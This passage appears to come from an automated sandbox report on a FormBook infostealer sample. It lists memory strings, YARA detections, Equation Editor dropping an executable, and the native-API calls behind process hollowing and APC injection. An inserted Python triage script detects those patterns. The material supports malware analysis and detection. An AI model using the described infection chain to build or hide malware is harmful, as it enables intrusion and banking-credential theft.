          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2216497728.00000000039F4000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2225535708.000000000861C000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00418300 NtClose,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_004181CB NtCreateFile,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041827B NtReadFile,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00418222 NtReadFile,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041842A NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00920048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00920078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009207AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009210D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00920060 NtQuerySection,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009201D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0092010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00921148 NtOpenThread,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_020200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_020207AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_02020048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_02020060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_02020078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_020210D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0202010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_02021148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_020201D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_02021930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_02020C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_02021D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D81D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D8280 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D8300 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D83B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D81CB NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D8222 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D827B NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D83AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_000D842A NtAllocateVirtualMemory,
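The behaviour entries above contain three things a responder actually acts on: Equation Editor (EQNEDT32.EXE) writing a PE into the world-writable C:\Users\Public directory, RWX allocations at 0x76E20000 and 0x76D20000 in the address window where 32-bit system DLLs load, and a native-API set in wlanext.exe (NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtQueueApcThread, NtResumeThread) that spells out process hollowing and APC injection. The script below is an added example, not Joe Sandbox or FormBook code, that parses such lines and raises those findings. Its SAMPLE is constructed from entries in this report; the " | " separator between source and event and the 0x70000000-0x7FFFFFFF system-DLL range are assumptions of the example. The explorer.exe memory strings listed earlier are deliberately not fed to it: they are Internet Explorer's built-in search-provider and favicon URLs, present in explorer.exe memory regardless of the sample, and are not C2 indicators.

```python
"""Triage helper for sandbox behaviour lines like those listed in this report.
Added example, not Joe Sandbox or FormBook code. SAMPLE is constructed from
entries in the report; the " | " separator between source and event is mine."""
import re
from collections import defaultdict

SAMPLE = r"""
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\wlanext.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Code function: 7_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 7_2_00920078 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_02021930 NtSetContextThread,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0201FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_02020078 NtResumeThread,
"""

# Accepts both "...EXE | File created:" and the fused "...EXEFile created:" form
# that appears when the report table is flattened to plain text.
LINE_RE = re.compile(r"^Source:\s*(?P<src>.+?)\s*\|?\s*"
                     r"(?P<kind>File created|Memory allocated|Code function):\s*(?P<detail>.+?)\s*$")
FUNC_RE = re.compile(r"^(?P<addr>\d+_\d+_[0-9A-Fa-f]+)\s*(?P<apis>.*)$")
ALLOC_RE = re.compile(r"^(?P<addr>[0-9A-Fa-f]+)\s+page\s+(?P<prot>.+)$")

# Native API stages that together make up process hollowing. A process covering
# all five is flagged; a subset is still reported so partial evidence is visible.
HOLLOW_STAGES = {
    "create": {"NtCreateProcessEx", "NtCreateProcess", "NtCreateUserProcess"},
    "unmap": {"NtUnmapViewOfSection"},
    "write": {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "hijack": {"NtSetContextThread", "NtQueueApcThread"},
    "resume": {"NtResumeThread"},
}
# Assumption of this example: 32-bit (WOW64) system DLLs such as kernel32 and
# advapi32 are mapped in the 0x70000000-0x7FFFFFFF window on this sandbox.
SYSTEM_DLL_RANGE = (0x70000000, 0x80000000)
PE_SUFFIXES = (".exe", ".dll", ".scr", ".cpl")


def parse(lines):
    """Split report text into {src, kind, detail} records; other lines are skipped."""
    return [m.groupdict() for m in (LINE_RE.match(l.strip()) for l in lines.splitlines()) if m]


def equation_editor_drops(records):
    """EQNEDT32.EXE writing a PE: the CVE-2017-11882 / CVE-2018-0802 dropper pattern."""
    return [r["detail"] for r in records
            if r["kind"] == "File created"
            and r["src"].lower().endswith("eqnedt32.exe")
            and r["detail"].lower().endswith(PE_SUFFIXES)]


def rwx_in_system_dll_range(records):
    """RWX allocations placed where system DLLs live (hook or shim staging)."""
    lo, hi = SYSTEM_DLL_RANGE
    hits = []
    for r in records:
        m = ALLOC_RE.match(r["detail"]) if r["kind"] == "Memory allocated" else None
        if m and "execute" in m.group("prot") and lo <= int(m.group("addr"), 16) < hi:
            hits.append((r["src"], int(m.group("addr"), 16)))
    return hits


def hollowing_stages(records):
    """Map each process to the hollowing stages its native-API calls cover."""
    apis = defaultdict(set)
    for r in records:
        m = FUNC_RE.match(r["detail"]) if r["kind"] == "Code function" else None
        if m:
            apis[r["src"]].update(a for a in m.group("apis").split(",") if a)
    return {proc: {stage for stage, names in HOLLOW_STAGES.items() if names & seen}
            for proc, seen in apis.items()}


def triage(lines):
    """Return human-readable findings for a block of report lines."""
    records = parse(lines)
    findings = [f"Equation Editor dropped executable: {p}" for p in equation_editor_drops(records)]
    for proc, addr in rwx_in_system_dll_range(records):
        findings.append(f"{proc} allocated RWX memory at {addr:#010x} inside the system DLL range")
    for proc, stages in hollowing_stages(records).items():
        if stages == set(HOLLOW_STAGES):
            findings.append(f"{proc} exhibits the full process hollowing API sequence")
        elif stages:
            findings.append(f"{proc} shows partial hollowing stages: {', '.join(sorted(stages))}")
    return findings


if __name__ == "__main__":
    print("\n".join(triage(SAMPLE)))
```

Run as a script, it prints five findings for the sample: the dropped vbc.exe, one RWX allocation each for vbc.exe and wlanext.exe, partial hollowing stages for vbc.exe (only NtUnmapViewOfSection and NtResumeThread are in the sample) and the full sequence for wlanext.exe. The staged rule is deliberate: a single NtUnmapViewOfSection or NtResumeThread is common in legitimate loaders, so the example flags the combination and leaves the partial matches visible rather than suppressing them.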
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CB21
